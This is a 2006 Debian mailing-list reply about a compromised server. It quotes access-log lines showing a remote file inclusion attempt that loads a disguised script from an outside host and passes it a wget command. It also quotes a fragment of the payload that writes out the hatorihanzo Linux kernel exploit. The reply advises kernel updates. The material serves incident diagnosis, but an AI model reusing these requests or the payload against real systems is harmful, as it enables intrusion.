On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote: > 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET > http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget > HTTP/1.0" 403 495 > "http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; > "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" > 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET > http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget > HTTP/1.0" 403 499 > "http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; > "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" > > http://213.202.214.106/CMD.gif isn't a gif. > > [snip] > > if ($kernel == "write") { > $kernel = "/*\n" . > " * hatorihanzo.c\n" . > " * Linux kernel do_brk vma overflow exploit.\n" . > " *\n" . > " * The bug was found by Paul (IhaQueR) Starzetz > <[EMAIL PROTECTED]>\n" . > " *\n" . > " * Further research and exploit development by\n" . > " * Wojciech Purczynski <[EMAIL PROTECTED]> and Paul > Starzetz.\n" . > " *\n" . > " * (c) 2003 Copyright by IhaQueR and cliph. All Rights > Reserved.\n" . > " *\n" . > " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION > AND ANY USE\n" . > " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" . > > [/snip] > > I think this will give you an idea of what happened.
keep your kernel uptodate, easiest if you use the Debian provided linux images they have security support. this hole is closed since long there. -- maks -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
![http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"](http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"){kind=link}
![http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"](http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"){kind=link}
